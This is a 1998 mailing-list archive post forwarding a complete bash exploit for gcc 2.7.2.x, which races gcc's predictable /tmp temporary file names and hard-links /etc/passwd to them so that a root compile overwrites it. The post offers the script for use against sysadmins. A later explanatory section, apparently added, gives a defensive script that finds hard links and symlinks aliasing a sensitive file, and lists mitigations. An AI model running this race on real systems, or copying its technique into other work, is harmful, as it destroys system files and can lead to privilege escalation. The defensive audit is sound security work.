GCC Exploit

From: Phillip R. Jaenke (prjat_private)
Date: Sat Jan 17 1998 - 22:27:51 PST


    Sorry if this has already been mentioned, but it's an updated version
    anyways. NOT fun. NOT good. Unless you wanna drive a sysadmin nuts. ;P
    
    --begin gcc-exploit-2--
    
    
    Try this. Launch it as an unprivileged user in the background (screen?), then,
    as root, try to compile any file or project using gcc (eg. a typical
    daemon, service, client), and watch your /etc/passwd (or any other
    vital file, eg. /dev/kmem, /dev/hda). The attached exploit is an improved
    version of the one I previously posted to BUGTRAQ (yesterday).
    
    It's also possible to overwrite other users' files (if only they
    use gcc occasionally), system logs etc.
    
    Vulnerable platforms: any running gcc 2.7.2.x
    Compromise: overwriting files, maybe root; exploitable locally.
    
    -- cut here --
    
    #!/bin/bash
    
    # [ http://www.rootshell.com ] 1/16/98
    # Simple GCC exploit (tested under 2.7.2.3.f.1)
    # - by Michal Zalewski (lcamtufat_private)
    # ---------------------------------------------
    # Usage: "screen ./gcc_ln" then Ctrl+A,D
    # ---------------------------------------------
    # Ugh, blah... Should be written in C for
    # better performance, but I have no time :)
    
    VICTIM=/etc/passwd
    
    if [ ! -f $VICTIM ]; then
      echo "I can't see my victim ($VICTIM)..."
      exit 0
    fi
    
    ORIG=`ls -l $VICTIM|awk '{print \$5}'`
    
    echo "GCC exploit launched against $VICTIM ($ORIG bytes)."
    
    renice +20 $PPID >&/dev/null
    
    cd /tmp
    
    while [ 1 ]; do
    
      V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
    
      if [ ! "$V" = "" ]; then
        ln $VICTIM ${V}.s &>/dev/null
        ln $VICTIM ${V}1.o &>/dev/null
        NOWY=`ls -l $VICTIM|awk '{print \$5}'`
        if [ "$ORIG" = "$NOWY" ]; then
          echo -n "."
          rm -f ${V}.s ${V}1.o &>/dev/null
        else
          echo "Voila. I'm so smart."
          rm -f ${V}.s ${V}1.o &>/dev/null
          exit 0
        fi
      fi
    
    done
    
    --end gcc-exploit-2--
    
    --Phillip R. Jaenke (prjat_private)
    Primary Developer, The Improvement Linux Project
    Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/
    AKA Kaeyerai (Rediscovery) of MasterTechnoMonster
    Maintainer, The Cleveland Modem Guide - http://web.raex.com/~prj/
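The script above works because gcc 2.7.2.x wrote its intermediates under predictable names in a shared /tmp, so a hard link (or symlink) planted at that name redirects gcc's output into the victim file. The following is an added example, not part of the original post or of gcc, written from the administrator's side: it audits a scratch directory for entries that alias a sensitive file, and reports the file's own hard-link count, which for /etc/passwd is normally exactly 1. It assumes a bash/dash-compatible shell (it uses `test -ef` and POSIX `ls`/`awk`); the function names `find_aliases` and `link_count` are this example's own.

```shell
#!/bin/sh
# Added example (not from the original post): look for hard links and symlinks
# in a scratch directory that alias a sensitive file, the condition the
# gcc temp-file race relies on. Runs unprivileged.

# find_aliases VICTIM DIR
#   Prints "hardlink PATH" or "symlink PATH" for each entry directly in DIR
#   that resolves to the same inode as VICTIM (VICTIM itself is skipped).
#   Returns 0 if any alias was found, 1 if none, 2 on bad arguments.
find_aliases() {
    victim=$1
    dir=$2
    [ -f "$victim" ] && [ -d "$dir" ] || return 2
    found=0
    for f in "$dir"/* "$dir"/.*; do
        [ -e "$f" ] || continue                     # unmatched glob or dangling symlink
        case "$f" in */.|*/..) continue ;; esac     # skip . and ..
        [ "$f" = "$victim" ] && continue            # the victim is not an alias of itself
        # -ef compares device and inode after following symlinks, so it
        # catches both hard links and symlinks pointing at the victim.
        if [ "$f" -ef "$victim" ]; then
            if [ -L "$f" ]; then kind=symlink; else kind=hardlink; fi
            printf '%s %s\n' "$kind" "$f"
            found=$((found + 1))
        fi
    done
    [ "$found" -gt 0 ]
}

# link_count FILE
#   Prints the hard-link count of FILE (second field of ls -ld). A value
#   above 1 for a file such as /etc/passwd means another name for that
#   inode exists somewhere on the same filesystem.
link_count() {
    ls -ld "$1" | awk '{print $2}'
}

# Usage: ./audit_links.sh /etc/passwd /tmp
if [ $# -eq 2 ]; then
    find_aliases "$1" "$2" || echo "no aliases of $1 found in $2"
    echo "link count of $1: $(link_count "$1")"
fi
```

Running it periodically from cron against /tmp and other world-writable directories gives a cheap signal for this class of attack. Two caveats: a symlink is only flagged if it currently resolves, and hard links must be on the same filesystem as the victim, which is why a separate /tmp mount (or the Linux `fs.protected_hardlinks` sysctl, which refuses unprivileged hard links to files the user does not own) removes the hard-link half of the problem outright; later gcc releases also stopped using predictable temporary names.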
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:39:54 PDT